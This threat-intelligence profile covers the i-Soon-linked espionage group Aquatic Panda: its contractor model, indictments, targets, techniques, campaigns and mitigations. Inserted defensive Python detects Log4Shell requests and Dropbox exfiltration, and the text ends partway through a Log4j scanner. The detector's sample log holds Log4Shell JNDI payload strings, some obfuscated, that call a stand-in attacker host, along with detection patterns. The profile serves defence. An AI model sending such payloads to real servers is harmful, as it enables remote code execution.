Aquatic Panda
A Chinese espionage actor operating under the Winnti Group umbrella and tied to i-Soon, the Chengdu-based MSS contractor exposed in a 2024 GitHub leak that revealed the scale of China's contractor-driven hacking apparatus. In March 2025, the FBI added named i-Soon employees to its Most Wanted list following DOJ indictments covering hacking campaigns from 2016 to 2023. i-Soon worked with at least 43 different MSS and MPS bureaus — charging between $10,000 and $75,000 per successfully compromised email inbox — and targeted governments, dissidents, religious organizations, and news outlets worldwide.
Overview
Aquatic Panda — tracked as FishMonger by ESET, Earth Lusca by Trend Micro, and Bronze University by SecureWorks — is the espionage arm of i-Soon (formally Anxun Information Technology Co., Ltd.), a private cybersecurity contractor based in Chengdu, China. The group operates within the broader Winnti Group ecosystem, sharing tools, infrastructure, and operational tradecraft with threat clusters that include APT41. Until 2024, Aquatic Panda was understood primarily as a competent but not uniquely exceptional Chinese espionage actor. The 2024 i-Soon document leak changed that picture entirely.
On February 21, 2024, the Taiwanese cybersecurity company TeamT5 discovered a link on GitHub containing an extensive leak of internal i-Soon documents — contracts, internal meeting records, product catalogs, target lists, and operational communications. The leaked material revealed i-Soon as a cornerstone of China's contractor-driven hacking apparatus: a company that had generated tens of millions of dollars in revenue by selling stolen data and offensive cyber services to at least 43 different bureaus of China's Ministry of State Security (MSS) and Ministry of Public Security (MPS) across 31 provinces. The BBC and NHK both independently authenticated the documents. When NHK reporters visited i-Soon's office to investigate, they found it empty.
The leaked documents provided an unprecedented window into how China uses private companies to conduct state-directed espionage while maintaining plausible deniability. i-Soon's business model was explicitly transactional: in some cases, the MSS or MPS would direct i-Soon to hack specific targets; in others, i-Soon would hack targets speculatively and then sell the resulting data to whichever government bureau was interested. The company charged between $10,000 and $75,000 per successfully compromised email inbox. It also sold a range of offensive cyber products — including an "Automated Penetration Testing Platform," a tool capable of compromising Twitter/X accounts and bypassing multi-factor authentication, and what it called a "zero-day vulnerability arsenal." It trained MPS employees to conduct their own hacking operations independently.
On March 5, 2025, the U.S. Department of Justice unsealed indictments charging eight i-Soon employees — including its CEO Wu Haibo and COO Chen Cheng — and two MPS officers for hacking campaigns spanning 2016 to 2023. On the same date, two separate indictments were unsealed charging Yin Kecheng and Zhou Shuai as members of APT27 (also tracked as Silk Typhoon, Emissary Panda, Lucky Mouse, Iron Tiger). Yin and Zhou are not i-Soon employees — they are APT27 freelance hackers who worked with i-Soon's ecosystem: Zhou Shuai brokered the sale of Yin Kecheng's stolen data through i-Soon to Chinese government clients. The FBI added individuals from both indictments to its Cyber Most Wanted list. The Department of State offered rewards of up to $10 million for information on i-Soon personnel and up to $2 million each for information leading to the arrest of Yin Kecheng and Zhou Shuai. The DOJ simultaneously seized four domains — some linked to i-Soon and some to the APT27 actors. China's embassy denied all involvement.
Naming for this actor is unusually complex. The FBI uses "Aquatic Panda" (a CrowdStrike designation) for the full i-Soon operation. ESET uses "FishMonger" for the specific espionage team within i-Soon. Trend Micro uses "Earth Lusca." Microsoft's Typhoon naming scheme designates this group as "Charcoal Typhoon" (formerly tracked as CHROMIUM), with AQUATIC PANDA, ControlX, RedHotel, and BRONZE UNIVERSITY listed as synonyms. CrowdStrike uses "Bronze University" for the academic-targeting cluster. All refer to the same underlying i-Soon operational team. "RedHotel" (Recorded Future) is also used. This profile uses "Aquatic Panda" as the primary name consistent with the FBI's designation.
The i-Soon Contractor Model
The i-Soon leak exposed the machinery of China's contractor-driven espionage apparatus in a level of detail that no prior indictment, hack, or intelligence disclosure had provided. Understanding Aquatic Panda requires understanding i-Soon's business model — because the two are inseparable.
- Dual Revenue Streams: i-Soon operated on two parallel business tracks. On the first, it accepted directed tasking from MSS and MPS bureaus — specific hacking assignments for specific targets — and was paid upon delivery of the stolen data. On the second, it conducted speculative hacking against targets it judged to be potentially valuable, then shopped the resulting data to interested government bureaus. This second model is what the DOJ called "largely indiscriminate" and explains why i-Soon victims included targets of no apparent Chinese state interest — the company was casting a wide net and sorting by salability afterward.
- 43 Government Bureau Clients: i-Soon worked with at least 43 different MSS and MPS bureaus spanning 31 provinces and municipalities — essentially the entire Chinese security apparatus at the provincial and municipal level. This scale indicates that i-Soon was not a niche contractor but a major infrastructure component of China's nationwide cyber intelligence collection system.
- Pricing Model: The leaked documents revealed i-Soon's rate card: $10,000 to $75,000 per successfully compromised email inbox, depending on the target's perceived value. This commodification of targeted access explains the group's broad victim profile — maximizing the per-operation revenue meant targeting as many organizations as possible across all sectors.
- Product Portfolio: Beyond hacking services, i-Soon sold offensive products including an "Automated Penetration Testing Platform" capable of phishing, malware delivery, and website cloning; a "Public Opinion Guidance and Control Platform (Overseas)" that could compromise Twitter/X accounts, bypass MFA, send and delete tweets, and monitor public opinion outside China; and a "zero-day vulnerability arsenal." i-Soon also trained MPS employees to conduct hacking operations themselves.
- Post-Leak Status: Despite the 2024 leak, i-Soon continued operating — with multiple subsidiaries active as of early 2025. However, the company's workforce shrank by roughly a third, it accumulated over $1 million in debt, faced dozens of lawsuits, and relocated offices. No significant new cyber activity attributed to i-Soon has been observed since early 2024.
- Chengdu 404 / APT41 Connection: Internal i-Soon documents referenced Chengdu Shuangyu Technology Co. Ltd. (known as "Chengdu 404"), the company behind APT41. This confirms documented tool and infrastructure sharing between i-Soon/FishMonger and the APT41 ecosystem and explains why Aquatic Panda operates within the Winnti Group umbrella.
Target Profile
Aquatic Panda's targeting reflects the dual nature of i-Soon's operations: government-directed political intelligence collection on one hand, and speculative opportunistic targeting on the other. The result is a victim profile that spans both high-value strategic targets and organizations that happened to be accessible and potentially saleable.
- Governments and Foreign Ministries: Foreign ministry servers of Taiwan, India, South Korea, and Indonesia are documented i-Soon targets from the indictment. ASEAN member state governments were targeted in the 2022 FishMedley campaign. These represent classic state-directed intelligence tasking — understanding what foreign ministries communicate about the U.S., each other, and China.
- Dissidents and Chinese Government Critics: The indictment specifically identifies U.S.-based critics and dissidents of the PRC as targets. i-Soon targeted individuals who had publicly criticized the Chinese Communist Party, consistent with the MPS's domestic security mandate extended to the diaspora. This mirrors the political surveillance track seen in APT32's operations.
- Religious Organizations: A large U.S.-based religious organization that sent missionaries to China and was critical of the government was a confirmed target. An organization promoting religious freedom in China was also targeted. The indictment notes that targets were selected in part because they were "threatening to the rule of the Chinese Communist Party."
- NGOs and Think Tanks: Operation FishMedley (2022) targeted a geopolitical think tank in France, an NGO in the United States, and Catholic charities in Hungary and the United States. These targets reflect interest in Western policy analysis and civil society organizations that engage on China-sensitive issues.
- News Organizations: Multiple U.S. news organizations were targeted, specifically those identified as propagating uncensored news to people across Asia. A Hong Kong newspaper was also a documented target. This is consistent with China's documented interest in monitoring and suppressing foreign press coverage of CCP-sensitive topics.
- Technology Companies, Defense Contractors, Law Firms, and Universities: The broader i-Soon operation targeted U.S.-based technology companies, think tanks, law firms, defense contractors, local governments, healthcare systems, and universities in campaigns connected to Yin Kecheng and Zhou Shuai — the two hackers also linked to the Treasury breach. This reflects the speculative targeting model: broadly compromising high-value organization types and selling what proved to be of interest.
- Academic Institutions: The December 2021 Log4Shell campaign documented by CrowdStrike targeted a large academic institution — using a modified version of the Log4j exploit against a VMware Horizon instance to attempt credential harvesting and network access.
Tactics, Techniques & Procedures
Aquatic Panda's technique footprint reflects an operator that prioritizes access and collection over technical novelty. The group reuses well-documented tools — ShadowPad, SodaMaster, Cobalt Strike — long after they have been publicly described, relying on legitimate-appearing network behavior and privileged access to evade detection rather than novel evasion techniques. The Log4Shell exploitation in December 2021 demonstrates willingness to rapidly integrate widely available exploit code.
| mitre id | technique | description |
|---|---|---|
| T1190 | Exploit Public-Facing Application | CVE-2021-44228 (Log4Shell — Apache Log4j RCE, CVSS 10.0) was exploited by Aquatic Panda in December 2021 against a large academic institution, targeting a VMware Horizon Tomcat web server running the vulnerable Log4j library. CrowdStrike OverWatch detected the intrusion via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org executed under the Apache Tomcat service. The group used a modified version of the Log4j exploit published on GitHub on December 13, 2021 — just days after public disclosure — demonstrating rapid integration of newly available exploit code. |
| T1566.001 | Spear-Phishing Attachment | i-Soon's "Automated Penetration Testing Platform" included phishing email capability and file-with-malware delivery — creating attachments that, when opened, provided access to victims' computers. Spear-phishing was i-Soon's primary initial access vector for targeted government and civil society campaigns. Lures were tailored to the target's professional context — government policy documents for ministry targets, religious content for religious organization targets. |
| T1213 | Data from Information Repositories | i-Soon specifically collected email inbox contents as its primary deliverable — charging government clients per successfully compromised inbox. Email collection from Exchange servers, government mail systems, and personal accounts was systematically conducted across all campaign types. Stolen email data was then reviewed for intelligence value and sold to the most interested MSS or MPS bureau. |
| T1078 | Valid Accounts — Domain Administrator Credentials | In Operation FishMedley, ESET noted that in most cases operators appeared to have privileged access inside the local network — specifically, domain administrator credentials — upon arrival in the victim environment. This suggests initial access was followed by rapid privilege escalation, or that credential material was stolen in prior phases not captured in the ESET analysis. The use of domain admin credentials allowed silent lateral movement with legitimate authentication events. |
| T1003.001 | OS Credential Dumping — LSASS Memory | ESET documented credential theft via LSASS process dumps in Operation FishMedley. At a U.S.-based NGO victim, attackers executed reconnaissance commands and extracted credential material via LSASS memory access, providing authentication material for further lateral movement. Credentials extracted in this manner can include domain user hashes, Kerberos tickets, and cached cleartext credentials. |
| T1021.006 / T1570 | Lateral Movement — Impacket | ESET documented the use of Impacket — an open-source Python framework providing implementations of network protocols including SMB, Kerberos, and LDAP — in Operation FishMedley for lateral movement and privilege escalation. At the U.S.-based NGO victim, attackers used Impacket to escalate privileges, execute system commands remotely, and extract sensitive registry hives containing authentication data. Impacket's legitimate dual-use nature complicates detection, but its execution from unusual parent processes or against non-standard targets is a reliable behavioral indicator. |
| T1016 | System Network Configuration Discovery | In the Log4Shell intrusion, Aquatic Panda performed network reconnaissance including DNS connectivity checks via dns[.]1433[.]eu[.]org to confirm successful exploitation. In Operation FishMedley, the fscan network scanner and a NetBIOS scanner were used for host and network discovery within victim environments after gaining initial access. |
| T1555 | Credentials from Password Stores | A custom password exfiltration tool was documented in Operation FishMedley alongside network scanners — extracting stored credential material from victim systems post-compromise. Credential collection is a consistent operational priority, providing both lateral movement capability within the current victim and potentially reusable credentials across other targets that share authentication providers. |
| T1567 | Exfiltration to Cloud Storage (Dropbox) | ESET documented a tool in Operation FishMedley designed to interact with Dropbox — likely used to exfiltrate collected data from victim networks through the Dropbox cloud service. Using a legitimate cloud storage provider for exfiltration blends outbound data transfers with normal enterprise cloud traffic, defeating controls focused on known-malicious C2 domains. |
| T1556.006 | Modify Authentication Process — MFA Bypass (Twitter/X) | i-Soon's "Public Opinion Guidance and Control Platform (Overseas)" included documented capability to compromise Twitter/X accounts and bypass multi-factor authentication — accessing accounts without the victim's password, then sending tweets, deleting tweets, making comments, and monitoring content. This tool was sold to Chinese government customers to enable both surveillance of critics' accounts and the ability to manipulate public opinion outside China through a network of compromised accounts. |
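The T1190 row and the Log4Shell campaign description both hinge on two observables: a JNDI lookup string arriving in a web request (often wrapped in nested lookups such as `${${lower:j}ndi:...}` to hide the literal `jndi`), and a DNS query made by the application server's own process to a name it has no business resolving. The following Python is an added example, not code from the page or from CrowdStrike; it normalises the lookup obfuscation before matching and flags DNS queries from Java server processes to names outside an allowlist. The process names, the allowlist, the access-log lines and the DNS events are constructed assumptions (the `ws_TomcatService.exe` name is the Tomcat wrapper used by VMware Horizon; the queried label under the page's `dns[.]1433[.]eu[.]org` indicator is invented).

```python
"""Detections for the Log4Shell tradecraft in the table above: JNDI lookups in web
requests (including nested-lookup obfuscation) and DNS queries issued by a Java
application-server process to a domain outside an allowlist.
Added example; every log line below is constructed, not real telemetry."""
import re
from urllib.parse import unquote

# Log4j lookup syntax lets an attacker hide the literal "jndi" behind nested
# substitutions such as ${lower:j}ndi or ${::-j}ndi. Collapse those before matching.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")             # ${x:-J} -> J
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)  # ${lower:J} -> J
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def normalize_lookups(text: str, rounds: int = 8) -> str:
    """Percent-decode twice (handles %2524-style double encoding) and unwrap
    nested lookups until the string stops changing."""
    text = unquote(unquote(text))
    for _ in range(rounds):
        unwrapped = _CASE_LOOKUP.sub(r"\1", _DEFAULT_VALUE.sub(r"\1", text))
        if unwrapped == text:
            break
        text = unwrapped
    return text


def find_jndi_requests(access_log_lines):
    """Return (line_number, scheme) for every request line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(access_log_lines, 1):
        m = _JNDI.search(normalize_lookups(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Java server processes that should not resolve arbitrary external names
# (assumption: tune to the estate; ws_TomcatService.exe is VMware Horizon's wrapper).
JAVA_SERVER_PROCESSES = {"java", "java.exe", "tomcat9.exe", "ws_tomcatservice.exe"}


def find_suspicious_dns(dns_events, allowed_suffixes):
    """Flag DNS queries from Java server processes whose name does not end in an
    allowed suffix (the organisation's own zones plus approved vendor domains)."""
    flagged = []
    for ev in dns_events:
        proc = ev["process"].lower()
        if proc not in JAVA_SERVER_PROCESSES:
            continue
        qname = ev["query"].lower().rstrip(".")
        if not any(qname == s or qname.endswith("." + s) for s in allowed_suffixes):
            flagged.append((ev["host"], proc, qname))
    return flagged


# Constructed sample data (not real telemetry).
ACCESS_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [13/Dec/2021:10:02:12 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.7/b} HTTP/1.1" 200 512 "-" "curl"',
    '203.0.113.7 - - [13/Dec/2021:10:02:13 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fc.example%7D HTTP/1.1" 200 512 "-" "curl"',
]
DNS_EVENTS = [
    {"host": "horizon-cs1", "process": "ws_TomcatService.exe", "query": "vcenter.corp.example"},
    # The label "a1b2c3" is invented; the parent domain is the indicator cited on the page.
    {"host": "horizon-cs1", "process": "ws_TomcatService.exe", "query": "a1b2c3.dns.1433.eu.org"},
    {"host": "wks-42", "process": "chrome.exe", "query": "www.dropbox.com"},
]
ALLOWED = ["corp.example", "vmware.com"]

if __name__ == "__main__":
    print(find_jndi_requests(ACCESS_LOG))        # [(2, 'ldap'), (3, 'rmi'), (4, 'dns')]
    print(find_suspicious_dns(DNS_EVENTS, ALLOWED))
```

The request-side check catches the exploit attempt; the DNS-side check is the one that fires even when the request never reached a log (TLS-terminated elsewhere, header not logged), which is why the page's OverWatch detection keyed on the Tomcat service's DNS activity rather than on request content.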
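The T1567 row (and the Dropbox monitoring guidance in the mitigation section) describes exfiltration that hides inside legitimate cloud traffic, so the useful signals are which process talks to the Dropbox API, what spawned it, and how much it sends. The following Python is an added example, not code from the page or from ESET; it applies those three checks to constructed endpoint network events. The Dropbox hostnames are the service's public API and content endpoints; the expected-client list, the expected-parent list, the 50 MB threshold and the events are assumptions for illustration.

```python
"""Dropbox exfiltration detection over endpoint network telemetry: Dropbox API
connections from processes that are not Dropbox clients or browsers, expected
clients launched from unusual parents, and per-host outbound volume to Dropbox
above a threshold. Added example; all events are constructed."""
from collections import defaultdict

DROPBOX_HOSTS = {
    "api.dropboxapi.com", "content.dropboxapi.com",
    "www.dropbox.com", "dl.dropboxusercontent.com",
}
# Assumption: on a managed endpoint only these should reach Dropbox directly.
EXPECTED_CLIENTS = {"dropbox.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Assumption: interactive launches come from explorer.exe; service-style
# launches of the sync client come from services.exe/userinit.exe.
EXPECTED_PARENTS = {"explorer.exe", "services.exe", "userinit.exe"}


def detect_dropbox_exfil(events, volume_threshold=50 * 1024 * 1024):
    """Return (kind, host, detail, dest) findings. Each event is a dict with
    host, process, parent, dest and bytes_out."""
    findings = []
    bytes_by_host = defaultdict(int)
    for ev in events:
        dest = ev["dest"].lower()
        if dest not in DROPBOX_HOSTS:
            continue
        proc, parent = ev["process"].lower(), ev["parent"].lower()
        bytes_by_host[ev["host"]] += ev["bytes_out"]
        if proc not in EXPECTED_CLIENTS:
            findings.append(("unexpected_process", ev["host"], proc, dest))
        elif parent not in EXPECTED_PARENTS:
            findings.append(("unusual_parent", ev["host"], f"{parent}>{proc}", dest))
    for host, total in bytes_by_host.items():
        if total > volume_threshold:
            findings.append(("volume", host, total, None))
    return findings


MB = 1024 * 1024
# Constructed sample events: a normal browser session, a file server pushing
# 70 MB through an unknown binary spawned by cmd.exe, and a sync client
# launched from PowerShell.
EVENTS = [
    {"host": "wks-11", "process": "chrome.exe", "parent": "explorer.exe",
     "dest": "www.dropbox.com", "bytes_out": 2 * MB},
    {"host": "fs-01", "process": "updater.exe", "parent": "cmd.exe",
     "dest": "content.dropboxapi.com", "bytes_out": 40 * MB},
    {"host": "fs-01", "process": "updater.exe", "parent": "cmd.exe",
     "dest": "content.dropboxapi.com", "bytes_out": 30 * MB},
    {"host": "wks-22", "process": "Dropbox.exe", "parent": "powershell.exe",
     "dest": "api.dropboxapi.com", "bytes_out": 1 * MB},
    {"host": "wks-22", "process": "outlook.exe", "parent": "explorer.exe",
     "dest": "outlook.office365.com", "bytes_out": 5 * MB},
]

if __name__ == "__main__":
    for finding in detect_dropbox_exfil(EVENTS):
        print(finding)
```

A file server is the telling case: it should have no interactive user, so any process on it reaching the Dropbox content endpoint is worth a ticket regardless of volume, and the volume rule then adds the scale.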
Known Campaigns
The first FishMonger/Aquatic Panda campaign documented by ESET was conducted during the Hong Kong civic protests that began in June 2019. FishMonger heavily targeted universities in Hong Kong using ShadowPad and Winnti malware — initially attributed to the broader Winnti Group before ESET revised attribution specifically to FishMonger. The timing is consistent with Chinese government intelligence requirements: understanding the academic networks coordinating and participating in pro-democracy protests, identifying protest organizers and supporters, and monitoring communications about the movement. This campaign established the group's pattern of targeting institutions and individuals relevant to CCP political concerns.
CrowdStrike OverWatch documented Aquatic Panda exploiting CVE-2021-44228 (Log4Shell) against a large academic institution within days of the vulnerability's public disclosure on December 9, 2021. The group targeted a VMware Horizon Tomcat web server running the vulnerable Log4j library, using a modified version of an exploit published on GitHub on December 13. The attackers performed connectivity checks via DNS lookups for dns[.]1433[.]eu[.]org running under the Apache Tomcat service, then proceeded with reconnaissance and credential harvesting post-exploitation. CrowdStrike OverWatch detected and interrupted the intrusion before it progressed to significant data collection — but the speed of exploitation, three to four days after public disclosure of a CVSS 10.0 vulnerability, demonstrated the group's active monitoring of exploit releases and ability to rapidly operationalize new attack code.
Operation FishMedley was a 10-month global espionage campaign documented by ESET, spanning seven confirmed victims across Asia, Europe, and the United States. Victims included governmental organizations in Taiwan and Thailand, Catholic charities in Hungary and the United States, an NGO in the United States, a geopolitical think tank in France, and an unknown organization in Turkey. The campaign used five malware families: a ScatterBee loader dropping ShadowPad, Spyder, SodaMaster, and RPipeCommander (a previously undocumented reverse shell deployed against the Thai government organization). In most intrusions, operators appeared to have domain administrator credentials upon arrival — suggesting prior compromise or rapid privilege escalation not captured in ESET's visibility window. A Dropbox-connected exfiltration tool and custom password harvester were also deployed. ESET independently confirmed FishMonger's i-Soon affiliation through analysis corroborated by the 2024 leak. The DOJ's March 2025 indictment specifically referenced attacks consistent with the FishMedley campaign in its charges against i-Soon employees.
The DOJ indictment unsealed March 5, 2025 documents the full scope of i-Soon's operations. Eight i-Soon employees — including CEO Wu Haibo and COO Chen Cheng — and two MPS officers were charged with hacking campaigns spanning 2016 to 2023. Documented targets included: U.S.-based critics and dissidents of the PRC; a large religious organization in the United States critical of the Chinese government; an organization focused on promoting religious freedom in China; multiple U.S. news organizations propagating uncensored news to Asia; the foreign ministries of Taiwan, India, South Korea, and Indonesia; a Hong Kong newspaper; and a religious leader in an unnamed country. In addition to i-Soon's targeted political surveillance, Yin Kecheng and Zhou Shuai were separately charged with broader hacking of U.S. technology companies, think tanks, law firms, defense contractors, local governments, healthcare systems, and universities — selling stolen data through i-Soon to Chinese government clients.
Yin Kecheng — an APT27-affiliated freelance hacker sanctioned by the U.S. Treasury Department's Office of Foreign Assets Control in February 2025 — was charged in connection with the breach of the U.S. Department of the Treasury that lasted from approximately September to December 2024. The virtual private servers used to conduct the Treasury intrusion belonged to an account that Yin and his co-conspirators established. Yin Kecheng and Zhou Shuai are not i-Soon employees — they were charged in separate APT27 indictments (APT27 is also tracked as Silk Typhoon, Emissary Panda, and Lucky Mouse). However, Zhou Shuai brokered the sale of Yin Kecheng's stolen data through i-Soon to Chinese government clients, and the VPS infrastructure used in the Treasury breach was seized alongside i-Soon's domains on March 5, 2025. The FBI seized these VPS and other infrastructure under a seizure warrant. The Treasury breach gave attackers access to Treasury workstations and unclassified documents. This operation is the most recent documented action directly linked to the broader i-Soon ecosystem — though the operators themselves are APT27 actors who worked with, rather than within, i-Soon.
Tools & Malware
Aquatic Panda's toolset combines Winnti Group-shared implants with commodity frameworks and i-Soon-developed proprietary products. A notable operational characteristic is the group's willingness to reuse well-documented malware long after public disclosure — relying on the difficulty of detecting known-good implants behaving normally rather than on tool novelty.
- ShadowPad: A modular backdoor shared across multiple Chinese APT groups within the Winnti/APT41 ecosystem and considered a successor to the PlugX family. Supports a plugin architecture for extensibility without implant replacement. Used in Operation FishMedley across multiple victim intrusions and in the 2019 Hong Kong university campaign. ShadowPad's widespread use across the Chinese APT ecosystem means its presence is indicative of Chinese state-aligned activity but not sufficient on its own for narrow attribution.
- SodaMaster: A backdoor initially associated with APT10, whose presence in Operation FishMedley indicates tool sharing across Chinese APT ecosystems. ESET noted that "APT10 was the first group known to have access to SodaMaster but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups." Provides remote access and C2 capability.
- Spyder: A backdoor used by FishMonger in targeted espionage campaigns including Operation FishMedley. Part of the group's standard implant deployment alongside ShadowPad and SodaMaster.
- RPipeCommander: A previously undocumented C++ reverse shell identified by ESET in the Operation FishMedley Thai government intrusion. Uses multiple threads and a named pipe interface to accept three commands: create a CMD process and bind pipes, write to an existing CMD process, and exit the CMD process. ESET analyzed only the server component; a client component for sending commands from elsewhere on the local network is assessed to exist.
- ScatterBee: A loader used in Operation FishMedley to deliver ShadowPad, Spyder, SodaMaster, and RPipeCommander to victim systems. Serves as the initial staging component that drops and executes the primary implants.
- FunnySwitch: A backdoor in FishMonger's documented arsenal, providing C2 capability in targeted campaigns.
- SprySOCKS: A backdoor documented in FishMonger's toolset. Used alongside ShadowPad and other Winnti-lineage tools in targeted espionage operations.
- BIOPASS RAT: A remote access trojan attributed to FishMonger, providing comprehensive remote access capability including file operations, screen capture, process management, and C2 communication.
- Cobalt Strike BEACON: Used alongside custom backdoors in FishMonger operations. Provides flexible post-exploitation capability and is consistent with the group's broader approach of mixing custom and commodity offensive tools.
- Impacket: An open-source Python framework providing implementations of network protocols (SMB, Kerberos, LDAP) documented by ESET in Operation FishMedley. Used for lateral movement, remote command execution, privilege escalation, and extraction of sensitive registry hives containing authentication data. At the U.S.-based NGO victim, Impacket was specifically used alongside LSASS process dumping to harvest credentials and move laterally with domain administrator privileges.
- i-Soon Proprietary Products: The leaked documents described an "Automated Penetration Testing Platform" (phishing, malware delivery, website cloning), a "Public Opinion Guidance and Control Platform (Overseas)" (Twitter/X compromise, MFA bypass, tweet manipulation), and a "zero-day vulnerability arsenal." These commercial products were sold to MSS and MPS clients and used in i-Soon's own operations.
Indicators of Compromise
The following IOCs are drawn from ESET's Operation FishMedley analysis (March 2025), CrowdStrike's Log4Shell intrusion documentation (December 2021), and the DOJ's March 2025 indictment. Full IOC sets for FishMedley are published in ESET's GitHub repository.
The March 2025 DOJ seizure of i-Soon's primary domain and VPS infrastructure significantly disrupted known Aquatic Panda operational infrastructure. Current campaigns will use new infrastructure entirely distinct from pre-2025 IOCs. Behavioral and tool-based detection (ShadowPad, ScatterBee, Dropbox exfiltration) is more reliable than infrastructure IOCs for this group going forward.
Mitigation & Defense
Aquatic Panda / i-Soon is assessed as operationally degraded but not eliminated following the 2025 indictments, DOJ infrastructure seizures, and significant company disruption. Multiple i-Soon subsidiaries remained active as of early 2025. The broader contractor ecosystem that i-Soon represents — China's hacker-for-hire apparatus — remains fully operational. Organizations in sectors targeted by the confirmed i-Soon campaigns should treat this threat as ongoing.
- Log4j (CVE-2021-44228) Remediation — Confirmed Gap Check: Aquatic Panda exploited Log4Shell within days of disclosure in December 2021. Any organization still running Log4j versions prior to 2.17.1 (Java 8), 2.12.4 (Java 7), or 2.3.2 (Java 6) is exposed to a documented Aquatic Panda attack technique. Conduct an authenticated vulnerability scan specifically searching for Log4j library versions in all Java-based applications, including embedded components in middleware and commercial software that may not be updated through standard OS patching. Pay particular attention to VMware Horizon, Apache Tomcat, and other Java-based application servers exposed to the internet.
- Domain Administrator Credential Protection: Operation FishMedley attackers appeared to have domain administrator credentials in most victim environments — enabling silent lateral movement with legitimate authentication events. Implement tiered administration (Privileged Access Workstations), enforce strict separation between standard user and administrator accounts, monitor for anomalous use of domain admin credentials outside normal administrative patterns, and require phishing-resistant MFA on all accounts with domain administrative privilege.
- ShadowPad and China-Aligned Implant Detection: ShadowPad and SodaMaster are documented Aquatic Panda tools. Deploy EDR capable of detecting ShadowPad's memory injection patterns, named pipe usage, and network communication behaviors. ShadowPad's encrypted communications and in-memory execution require behavioral detection rather than file-based signature matching — ensure your EDR has active behavioral detection rules for ShadowPad specifically. ESET's IOC repository for FishMedley contains specific hashes and indicators.
- Dropbox and Cloud Storage Exfiltration Monitoring: Aquatic Panda uses Dropbox API calls for data exfiltration. Monitor for Dropbox API connections from non-user processes, unusual process ancestry for cloud storage API calls, and anomalous outbound transfer volumes to cloud storage services. DLP controls that inspect outbound cloud storage uploads should be deployed on sensitive data repositories and file servers.
- Email and Communication System Monitoring: i-Soon's primary revenue model was selling compromised email inbox contents. Implement monitoring for anomalous email access patterns — login from unusual geographic locations, bulk email reads from service accounts, forwarding rule creation, and access to mailboxes by accounts without normal business need. Enable audit logging on Exchange Online or on-premises Exchange at the full audit level, forward logs to a SIEM, and create alerts for forwarding rule creation and unusual bulk access events.
- Religious Organizations, NGOs, and Media — Civil Society Security: The i-Soon indictment identified religious organizations, NGOs, and news media as confirmed targets. Civil society organizations with China-sensitive work — documenting human rights abuses, supporting religious freedom, publishing uncensored news for Asian audiences — should assume they are within scope of i-Soon's successors or peer contractors. Implement phishing-resistant authentication (hardware security keys), encrypted communications for sensitive correspondence, and endpoint monitoring. Access Now's Digital Security Helpline and similar organizations provide threat-specific support for civil society groups facing nation-state threats.
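The Log4j gap check above asks for an inventory of library versions inside Java applications, including jars nested inside WAR and EAR archives that OS patching never touches. The following Python is an added example, not the page's or any vendor's tooling: it walks a directory tree, opens every archive and every archive nested inside it, reads the `log4j-core` version from the Maven `pom.properties` that Maven-built log4j-core jars carry, and compares it against the fixed versions the page lists (2.17.1 for Java 8, 2.12.4 for Java 7, 2.3.2 for Java 6). The sample application tree is constructed in a temporary directory so the script runs offline.

```python
"""Log4j (CVE-2021-44228) version inventory across jar/war/ear archives, including
nested archives. Added example; the sample tree is constructed in a temp directory."""
import io
import os
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.15.0-rc1' -> (2, 15, 0); qualifiers after '-' are ignored."""
    return tuple(int(p) for p in text.split("-")[0].split("."))


def is_vulnerable(version):
    """Fixed lines per the page: 2.17.1 (Java 8), 2.12.4 (Java 7), 2.3.2 (Java 6).
    Log4j 1.x is out of scope for CVE-2021-44228 and returns False."""
    v = parse_version(version)
    if v[0] != 2:
        return False
    if v[:2] == (2, 12):
        return v < (2, 12, 4)
    if v[:2] == (2, 3):
        return v < (2, 3, 2)
    return v < (2, 17, 1)


def log4j_versions(archive_bytes, path):
    """Return (path, version) for every log4j-core pom.properties found in the
    archive or in archives nested inside it ('outer!/inner' paths)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            if name == POM_PROPS:
                for line in zf.read(name).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        found.append((path, line.split("=", 1)[1].strip()))
            elif name.lower().endswith(ARCHIVE_EXT):
                found.extend(log4j_versions(zf.read(name), f"{path}!/{name}"))
    return found


def scan_tree(root):
    """Return (path, version, vulnerable) for every log4j-core found under root."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_EXT[:3]):
                continue
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                data = fh.read()
            try:
                for path, ver in log4j_versions(data, full):
                    results.append((path, ver, is_vulnerable(ver)))
            except zipfile.BadZipFile:
                continue  # not a real archive despite the extension
    return results


def _jar_with_log4j(version):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n")
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed fixture: a WAR embedding log4j-core 2.14.1 and a standalone 2.17.1 jar."""
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _jar_with_log4j("2.14.1"))
    os.makedirs(os.path.join(root, "app"), exist_ok=True)
    with open(os.path.join(root, "app", "portal.war"), "wb") as fh:
        fh.write(war.getvalue())
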